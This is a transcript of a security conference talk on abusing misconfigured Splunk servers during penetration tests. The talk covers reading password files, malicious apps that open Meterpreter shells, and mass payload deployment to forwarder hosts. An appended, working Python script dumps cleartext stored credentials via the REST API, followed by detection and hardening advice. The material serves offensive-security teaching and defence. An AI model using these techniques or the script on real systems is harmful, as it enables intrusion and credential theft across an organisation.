Weaponizing Splunk: Using Blue Team Tools For Evil - Ryan Hays

BSides Boston, 20:10, published 2017-05
About this talk
Splunk has secured a large portion of the log aggregation and correlation market. In turn, penetration testers find a lot of misconfigured implementations during engagements. This talk discusses creative abuses of the Splunk product to compromise the server and move laterally further into a target environment.
Transcript [en]

[Introduction inaudible.] Okay, so we're crunched on time. Yeah, so we won't be done by 5:25; this is an hour-long presentation, so I'm going to glance over a few things. Hopefully we get at least the good stuff. So, this is me: I'm Ryan, director of security engineering at EBG, which basically just means I hack stuff and I have to manage stuff at the same time, and whatnot.

So where does this talk come from? Last year we were on a pen testing engagement. We had internal access, popped a couple boxes, but we weren't really getting anywhere. We noticed that, hey, they've got Splunk, let's go look at it. So you navigate to the web page and it automatically logged me in as admin. Like, that's awesome, but what can I do from there, right? So we look at the data: we got some new usernames, we've got some machines and whatnot, but from there, how was I really going to leverage that into an attack? So we were able to build a custom app which, when we install it, we get OS access that way, and I'll start talking about that later. But then we were also able to install other apps that would allow us to laterally move throughout the network and basically own everything. So, kind of awesome.

So what am I here for? I'm going to kind of talk about Splunk, but I'm going to breeze over a lot of that because I hope most of you guys in here know at least what Splunk is; the basic stuff with misconfigurations that we see during our engagements, it's probably the same stuff that everybody else is seeing; and then really into what we're here for. So when I talk about weaponizing Splunk there's really three areas: we're attacking the server that the application's installed on, or attacking the organization, where we're moving laterally, and then I kind of started putting together a little bit of stuff where you could actually utilize Splunk as almost a C2. So you wouldn't really be using a customer or organization's Splunk server, you'd be using your own. So that's what I'm going to talk about with attacking the data. And then, I mean, what's the use of telling you how to break things if I don't tell you how to fix it? So we'll kind of touch on some mitigating actions really quickly.

So what is Splunk? A log aggregation tool. You can expand it using Python, PowerShell, Bash, just about any scripting language you have out there. With the expansions, it does allow command execution, which is really cool; it's the whole reason with the apps. Yeah, I mean, if anybody has any

questions on these slides, stop me and I could talk about them too.

So, the misconfigurations. The default password: now, Splunk has changed this in the recent 6.5 release, but anything prior to this, when you installed it the default password was changeme. It now does force the password reset upon installation. The older versions, like I talked about a minute ago, they did automatically log you in; now that was back probably version 4, 4.5, so a lot of that's been changed as well. If you're not using SSL you can do man-in-the-middle attacks. And then, obviously, we see this all the time, especially with the universal forwarders: they're running as root-level access, or SYSTEM-level access on the Windows box.

So, weaponizing Splunk. Like I talked about a minute ago, you're going to be attacking the server itself, and when we attack the server we're going to be looking at the logs that are already in place on there, and read over those. I mean, there's auth logs in there, I can get usernames; you might get web app logs in there, so now I know what web apps are out there, what configurations they're in, and what OS they might be running. Local file access: if Splunk's running as a root user or SYSTEM user, right now I have read access to every file on there, and there's no sort of logging in place there. And then malicious applications, that was what I talked about a minute ago, where you could install an app and we can actually own the entire server. So when we look at attacking the organization, I want to look at not only that Splunk server but every other box out there, because all these universal forwarders are going to be deployed out and they're going to be sending logs, or running applications that I write and send out to them. And finally the attack of the data, stuff like I talked about: just bringing in all of our pen testing logs.

So, reviewing the logs that are already there: auth logs, I can talk about, for usernames; system logs, you know, Windows system logs, application logs, I'll know what servers are out there, what the function of those servers are; I can get login information from both Linux and Windows boxes. So now I can profile my target and say, hey, they have eight-to-five working hours, or they have a rotating shift where everybody's working all day long; all that can be profiled out. Here's all the things I just talked about. Here's the files that I would actually go look for: /etc/shadow, now I have all your password

hashes on the boxes. Actually, I have a demo of this one, let's see here. So what we want to look at: local files. You can add data, and I can monitor... as long as I don't hit Next all the way to Finish, there's no log; none of this data is actually getting ingested by Splunk, but I can read it. So this would be a common misconfiguration: Splunk, you know, running as a root user or running as SYSTEM, and I can now read in all the passwords on a box, or I could read in the hostname or the /etc/hosts file to see what other boxes I communicate with, and any file really on the system there. And, as I said, as long as you don't keep hitting Next to go to Done, stay right here, none of this information is logged; it's not brought in; no one has any idea we were over here.

So, malicious applications. Splunk... something I didn't talk about a second ago, so I'll just try to go through it real quick. Splunk allows applications to be installed; usually those applications are helpful in parsing other data sets that you might be bringing in, but as I said it's expandable with scripting. So if you want to write a Python shell, a bind or reverse shell, or you want to write some other code that you want to run on the box, you can install that on Splunk. So here's a quick demo of this one. So from your attacking machine, I'm running Metasploit, but I mean you really could do this any way you wanted.

So start up our handler, we'll give it all the options, the IPs and ports.

Come on... it's going to allow me to guess where we're going. Okay, so we have a handler running, we're good to go. So now let's go back to Splunk. Come on, catch up. Okay, so here we're going to log in. Now, hopefully, through some sort of misconfiguration you have this credential to log in to Splunk, or it automatically logs you in, one or the other. We can go up top here to the configurations for the apps; we can install this from a file, because we've already downloaded it. All this stuff is on GitHub and the links are at the end. So we'll install our app from file.

Now there's one setting on the newest version of Splunk, on the 6.5 release: anything past 6.5, you do have to set the permissions here because you can't set it within the configuration file, at least I don't know how, if you can. So we'll set that and we'll save it. So what this does is this installs commands that you can run from the Search and Reporting app. So now we have it installed, we'll go over to Search and Reporting, and you now have new commands that you could run. With this one I only have a reverse and a bind shell, but literally it could be expanded any way you want. So we'll run a reverse shell, since we started a Meterpreter handler; we're going to do meterpreter shell, and we're going to give it the IP to communicate to and the port, and then we just hit Enter. So this will spin off a shell; it forks it off so that it's not sitting and running and consuming all your resources on your Splunk server, and also if anybody catches on and shuts down Splunk or logs you out, the shell's still going to live on. So now we're logged in, we have access to whatever they give us.

And obviously I can't type very well, but yeah, so there we go. So I've said everything's available on GitHub. It really was available on Splunkbase for a little while, about 54 minutes there. Yeah, so I submitted it to Splunk, and I mean the app is technically not malicious; I mean, you could use it any way you wanted to if you really wanted to install it. So yeah, it got approved, it was awesome, we all danced, I thought it was great; it would have made it a lot easier, versus downloading this and uploading it to a Splunk server and installing it, you literally could look for it inside Splunk and just hit Install and be good to go. But then, yeah, about 54, 56 minutes later I got a rejection email, and I'm sure somebody got their hands slapped. It was quite entertaining.

So we could extract data from Splunk as well. So Splunk has a fully featured API; the whole web interface is all based on the API as well. All the configuration files in Splunk, they have passwords of some sort. If you install a Windows app, for instance, and you want to talk to the domain controller, you have to have a user account to talk to the domain controller, so you want to save all that stuff. Splunk does do its best, and it does encrypt all the passwords, which is great, and it does use a salt when it encrypts them as well, and that salt is unique to each implementation so you can't copy it over. So here's just a demo, or not a demo but a screenshot, of what you would see, for instance, with the Windows app: you can fill out all your information and down there at the bottom you'd have to give it a user with at least read-only access, some user; nine times out of ten you usually find that they're higher-leveled. And so that's what that password looks like in a configuration file, so it is encrypted, it is salted, so you can't really decode it, but with about fourteen lines of Python I can. So using the Splunk API and those admin credentials that we're already logged in with, we can run this, and now down here at the bottom it loops through every app and every configuration that's available there, and we do get cleartext passwords, which is really awesome.

So now that we've attacked the server, we have our foothold on the server, we're good to go there; let's start attacking everybody else in the network. So as I said earlier, Splunk has universal forwarder apps that go out to every machine that you want to collect logs from, which usually is at least some high-level

machines Windows and Linux machines in your in your network these Universal forwarders do allow you to run scripts and apps and command execution as well so it's really cool they're all based on a deployment server I have some screenshots of that there's what a deployment server would look like you have clients to check in they check in on whatever interval you set usually you know 5 to 30 seconds to a minute whatever it is they split up all your apps or all your apps and all your hosts are split up based on classes these classes can be set up based on host names based on operating systems to make sure you install you know only windows

have some windows boxes and you don't fill up everybody space and then all your apps of course so with the app that we just installed earlier the shells app on there are two technology add-ons that I have and those need to be fixed so I'll make a note of that um there's two technology add-ons for Windows boxes and Linux boxes that will allow you to once I deploy out the application it runs the reverse to the blind shells again and they all call home so in a matter of seconds I could literally pop 60 to 80 boxes or however many early in their or Metasploit crashes one-hander so the windows one is based on it's a bat file

basically I run it's all based on PowerShell I use a unicorn to generate the power show or meterpreter PowerShell payloads but again you could put whatever the heck you wanted in there and that would run the Linux shows they saw the same actually really the same show that I was running on the other app it's python-based again it's just Metasploit it's all basic stuff but they can all be swapped out with whatever code you wanted so here's that demo and I've videotaped these because last time I did a live demo it all broke

so this step for the for the windows one I use the unicorn tool um Dave is he's still here he's one I wrote it so this just generates an output of a PowerShell script that you can run any host and it's basically phone to them gives you a matter prashanta box so that's what that looks like so we're just going to copy and paste that put that in our batch file so the configurations that I'm editing these are this is on the actual attacks or the victim server so the spunk shells with the app we installed a minute ago the two TAS that are right there that's where we're going to install we're going to move those to be deployed

Come on... Fast forward it. Oh yeah, it's not fast forwarding. Oh well, sorry.

So we edited that. Now we need to edit the Linux app, just to make sure that our IP and our ports are configured correctly, that we're coming back to the right attacking box.

All right, so we got those set up. Now we need to just go to... oh, we need to set up our handler first too.

[Inaudible.] All right, so we have a handler for our Windows payload. Obviously we need to have one for the Linux payload. Come on...

Any questions so far on that while this is going? [Audience question about the stager.] It is a staged payload with Metasploit. Okay, but no, it's not pulling anything from the internet; it would all be from your attacking machine, wherever you're sitting. Nope. Well, it is, but it's not from the internet. Yeah, it was, yeah, it's just from your attacking... All right, so we've already got the apps here that we saw a second ago. We can just edit out some... we'll add the server classes: add the Linux payload to those Linux boxes, and Windows, give the Windows one, vice versa.

Was there another question? Yeah. [Audience question about the encrypted passwords: did you decrypt them, or just find them in memory?] It's not memory. So the API actually goes through all the configuration files so that it can decrypt and use them; I just basically access that with the API and said, hey, I'm the app, I need my cleartext password, and it gives it to me. So here's the Meterpreter session coming back, so you can literally pop, you know, 30, 40, 50 boxes.

And so this one's still in development, as I said. So this would be on my attacking box: I would install Splunk, and then all these tools that we run during our pen test, Nmap, you know, Wi-Fi Pineapples, anything that we really run, it generates a lot of data, and it takes a lot of time to go through all that data when it comes down to reporting, and that's the part I hate about it. So if we had apps and installed them and pulled all our data into Splunk it would make our job a lot easier. Plus it decreases that dwell time from running an Nmap scan and having to peruse logs to find my ports; now I have it in real time. So for here, this is the Wi-Fi Pineapple app that I have set up; in real time I'd be getting data from the device that's out there doing its attack: the SSIDs it has, the clients, I know what's happening. Some things that I want to do in the future: I'd like to add context menus here so that I could quickly click on something and say, hey, run XYZ attack against it, and it would quickly do that for me. That's still in development. And then another one that we like to use is Responder. If you haven't used Responder, it's a man-in-the-middle attack tool; it grabs password hashes from different protocols running inside of a network. So if I was running this in real time I would have access to all the data that told me, hey, how many hashes have I captured, what are the usernames, and then down there at the bottom, everything's blurred because this is actually live data from a customer that we were working with. So down here at the bottom I can quickly download that file that gave me the password hashes and all the information that I could feed into my password cracker and quickly spit those back out. But yeah, so, yeah, I had to blur all that stuff. Up on the top right there you would have all the clients that I was actually attacking, and then right below that would be usernames.

Okay, so as I'm ending here we'll just talk about mitigating actions. Obviously, it's basic: update your software, enable encryption, change your passwords, and don't run this as root. And there's a really cool document right there at that link, and they walk you through probably 20 or 30 other things that you can do. And here's my information if anybody wants to reach out. And sorry, I know it was quick, but I only had 30 minutes. Any other questions?
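Added example, not code from the talk and not the speaker's GitHub app. The talk describes a roughly fourteen-line Python script that, using the admin session it already has, asks the Splunk REST API to hand over the cleartext of every credential the installed apps have stored, but the script itself is not on the page. This version does that step against Splunk's documented storage/passwords endpoint on the management port (8089 by default), which returns a clear_password field to any caller holding the list_storage_passwords capability (the admin role has it); the "-/-" namespace asks for every app and every owner at once. The hostname, account names and passwords in the sample are made up, and the parsing runs offline against a constructed response so the logic can be checked without a Splunk server.

```python
"""Pull every credential Splunk has stored for its apps via the REST API.

Added example (not from the talk). Assumes a reachable management port such as
https://splunk.example:8089 and an account with list_storage_passwords.
"""
import json
import ssl
import urllib.request
from base64 import b64encode
from typing import Dict, List


def stored_passwords_url(base_url: str) -> str:
    """REST URL for all stored credentials. count=0 lifts the default page limit."""
    return (f"{base_url.rstrip('/')}/servicesNS/-/-/storage/passwords"
            "?output_mode=json&count=0")


def parse_stored_passwords(json_text: str) -> List[Dict[str, str]]:
    """Extract app, realm, username and cleartext from an output_mode=json response.

    Each entry is named "<realm>:<username>:"; its content block carries the
    masked password (********), the encrypted form written to the .conf file,
    and, for callers with the capability, clear_password.
    """
    records = []
    for entry in json.loads(json_text).get("entry", []):
        content = entry.get("content", {})
        records.append({
            "app": entry.get("acl", {}).get("app", ""),
            "realm": content.get("realm", ""),
            "username": content.get("username", ""),
            "clear_password": content.get("clear_password", ""),
        })
    return records


def fetch_stored_passwords(base_url: str, user: str, password: str,
                           verify_tls: bool = False) -> List[Dict[str, str]]:
    """Authenticate with HTTP Basic and fetch every stored credential.

    Splunk ships a self-signed certificate on 8089, so verification is off by
    default; turn it on once you have the real certificate pinned.
    """
    req = urllib.request.Request(stored_passwords_url(base_url))
    token = b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return parse_stored_passwords(resp.read().decode("utf-8"))


# Constructed sample of the endpoint's JSON shape; every value here is made up.
SAMPLE_RESPONSE = json.dumps({
    "entry": [
        {
            "name": ":svc-splunk-ad:",
            "acl": {"app": "Splunk_TA_windows", "owner": "nobody"},
            "content": {
                "realm": "",
                "username": "svc-splunk-ad",
                "password": "********",
                "encr_password": "$1$...",
                "clear_password": "Winter2017!",
            },
        },
        {
            "name": "nmap-import:scanner:",
            "acl": {"app": "pentest_tools", "owner": "admin"},
            "content": {
                "realm": "nmap-import",
                "username": "scanner",
                "password": "********",
                "encr_password": "$1$...",
                "clear_password": "s3cret",
            },
        },
    ]
})


def demo() -> List[Dict[str, str]]:
    """Parse the constructed sample offline; no network required."""
    return parse_stored_passwords(SAMPLE_RESPONSE)


if __name__ == "__main__":
    # Against a live target this would be:
    #   fetch_stored_passwords("https://splunk.example:8089", "admin", "changeme")
    for rec in demo():
        print(f"{rec['app']:20} {rec['realm'] or '-':12} "
              f"{rec['username']:16} {rec['clear_password']}")
```

Two things worth knowing on the defending side. Every one of these requests lands in splunkd_access.log, so `index=_internal sourcetype=splunkd_access "storage/passwords"` shows who asked for the credential store and when, which is a cheap detection for this technique. And the blast radius is set by what the apps were given in the first place: a Windows add-on that holds a domain admin account turns one Splunk admin login into a domain compromise, so give those service accounts read-only rights, keep list_storage_passwords off roles that do not need it, and rotate the stored credentials after any suspected admin-level exposure.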